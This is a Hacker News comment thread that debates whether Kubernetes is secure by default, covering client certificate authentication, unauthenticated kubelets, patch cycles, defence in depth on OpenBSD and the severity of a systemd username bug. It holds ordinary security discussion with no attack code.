Hacker News new | past | comments | ask | show | jobs | submit login

To be fair, kubernetes itself and most distributions are quite secure by default. So with kubernetes it's not the same as it was NoSQL databases that didn't have authentication that were bound to the internet.

I'm not familiar with enough distributions to know if there is a popular distribution that totally disabled authentication by default, but in my companies distribution, kubeadm clusters, and I suspect all managed clusters (GKE/EKS/AKS/etc), the vector outlined in the article would only work if an admin specifically disabled the authentication.

In gravity (my companies distribution), we even disable anonymous-auth, so someone would have to do real work to allow API access to the internet.




Indeed modern versions of Kubernetes are fairly good for network security against unauthenticated attackers.

That said it's not that long ago that a lot of distros were shipping unauthenticated kubelets, and I think that's where a lot of this will come from.

From cluster reviews I've done, problems like this tend to arise where people are using older versions (so early adopters) or have hand-rolled their clusters, not realising all the areas that require hardening.


How do you provide your initial credentials, though? Providing decently secure default initial credentials is possible, but tricky.

And that's where I'll turn around 180 degrees and say: If you can't give me a hard reason why you'll be a hard target on the internet, you shouldn't have a public address. Default authentication isn't enough.

I dislike trusting my edge firewall, but it gives me time to handle weak internal systems.


Kubernetes only accepts very limited forms of auth by default.

Typically, it's limited to client certificates that have been signed by the private key the apiserver has access to.

Client cert auth over tls is pretty damn secure. I expose my kubernetes cluster's apiserver to the internet and have, to my knowledge, had no issues yet.


Client cert auth is quite good against unauthenticated attacks but has its downsides.

At the moment Kubernetes has no certificate revocation process at all, so if one of your users has their cert stolen for an Internet facing cluster, you'll have to rebuild the entire CA and re-issue all certs to get round the problem.


Yeah, client certs are a good, hard reason. In fact, now that I think of it, the services we expose to the internet all deploy mutual TLS authentication.


I strongly suspect we're going to encounter quite a few instances of admins (or individual developers, depending on how poorly-secured a given corporate network is) installing Kubernetes to test and play with, disabling auth for simplicity of testing, and then completely forgetting they have it installed or failing to properly shut it down and uninstall it.

They may consider that fine for security (the equivalent of having an insecure MySQL install on a machine with no tables of value in it), but might perhaps forget that even an empty Kubernetes install still lets attackers dictate what your CPU is doing.


You will have to patch a critical vulnerability every year on production systems, no matter what language or who develops it.

Secure defaults are irrevalent if you pay attention to the news.


> You will have to patch a critical vulnerability every year on production systems, no matter what language or who develops it.

Interesting. I've got a few openbsd boxes that do not have vulnerabilities that impact them nearly so often.

It turns out that if you practice defence in depth, the majority of security vulnerabilities in the news have no impact on you.

For example, on my openbsd boxes I have only a single user. I do not run any untrusted code. That means spectre/meltdown doesn't actually impact me because no one can run code which will perform such a timing attack.

There was a recent openbsd/Xorg security issue. I didn't have X installed, and even if I did since it's only a single-user server, it again wouldn't have impacted me (privilege escalation means nothing when everyone is effectively root in my threat model).

All vulnerabilities are not created equal, and with enough good practices it's possible to have boxes that are secure for years and years with no need for patches.


Yep. The bloated, overhyped and chruny mainstream crap needs updating all the time (and it kinda tends to break too). Build on that, and hope the updates get done before someone fires and exploit. That's defense in "pray and hope we're faster."

I'm not so concerned about my OpenBSD box with >800 days of uptime, which runs very limited and carefully selected services.


On this point, worth noting that the Kubernetes support lifecycle is currently 9 months, so you indeed need to plan not only for bugfixes but a full upgrade, fairly regularly


To be fair, you're playing with fire if you rely on product security to be perfect. For every SSHd out there there are multiple SystemD or worse security products.


I think you meant "OpenSSH" not SSHd, and "systemd" is always spelled lowercase. The 'd' doesn't stand for something and is never capitalized.

"sshd" is an ambiguous term as there are many ssh daemons, from the libssh server to dropbear to OpenSSH, and OpenSSH is likely the one that you use and the most secure one.

systemd has had a few security incidents, but very few of them are actually a big deal. People have overblown each and every one since there has become a cult of systemd hate, which has muddied the waters significantly.

> you're playing with fire if you rely on product security to be perfect

That's a vacuous statement; of course you can't rely on everything being perfect, so you must practice defence in depth. Everyone already knows software sometimes has bugs.

The point of the parent post is that Kubernetes does intend to allow secure use while being exposed publicly (unlike e.g. the default redis configuration). The parent post does not claim it is perfect and that you must never patch it, merely that it is reasonable and can be hardened.

In the end, there are tradeoffs. You must decide that the convenience of developers being able to ssh into machines is worth the risk of running OpenSSH. You must decide that using Google Apps is worth the risk that Google will have a data breach exposing all of your confidential information. You must decide that Slack can be trusted to write secure enough php that your messages aren't being read by others.

Just because something isn't perfect doesn't mean that it can't still be a good tradeoff based on the expected risk.


> "systemd" is always spelled lowercase. The 'd' doesn't stand for something and is never capitalized.

I thought the 'd' was a holdover from "daemon", as in initd or setsid, as a general name for a background process. systemd is a little more than just a background process but it's sort of the same idea.

From the wiki page: "In a strictly technical sense, a Unix-like system process is a daemon when its parent process terminates and the daemon is assigned the init process (process number 1) as its parent process and has no controlling terminal. However, more generally a daemon may be any background process, whether a child of the init process or not. "

https://en.wikipedia.org/wiki/Daemon_(computing)


From their documentation [0]:

> Yes, it is written systemd, not system D or System D, or even SystemD .... [You may also, optionally] call it (but never spell it!) System Five Hundred since D is the roman numeral for 500 (this also clarifies the relation to System V, right?).

The 'd' is a pun on both daemons typically being postfixed with 'd' and on the roman numeral for '500'. It does not directly stand for either though officially.

[0]: https://www.freedesktop.org/wiki/Software/systemd/


While naming trivia is interesting, it is a fact that systemd has had its fair share of security problems. And while it is a fact that OpenSSH is more mature, systemd has some issues with recognizing security failures as such https://www.reddit.com/r/linux/comments/6mykng/that_systemd_...


That is a perfect example of security FUD around systemd.

The attack vector is what? Someone manages to convince an administrator to write a service that has "User=0foo" in it?

If an attacker has access to write into `/etc/systemd/system` then they already have root on the system.

If an attacker can cause an administrator to write a systemd unit and the administrator isn't checking that it's reasonable, the attacker could just have the `ExecStart` line run a 'sploit and not have a `User` line at all.

Seriously, what is the attack that you imagine where this has a security impact?

As Poettering said on that issue, no one should be running system services as usernames starting with numbers, and that's questionably valid in the first place.

People still have blown it out of proportion because it's systemd.

Note that a similar issue exists in the old sys-v init scripts: they run as root, and if you convince a person writing a sys-v init script to exclude the `start-stop-daemon -u username` flag, then the daemon will run as root. Basically identical, but never assigned a CVE because no one seriously considers "I talked my sysadmin into running something as root" by itself a privilege escalation.


Yes, I meant OpenSSH




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: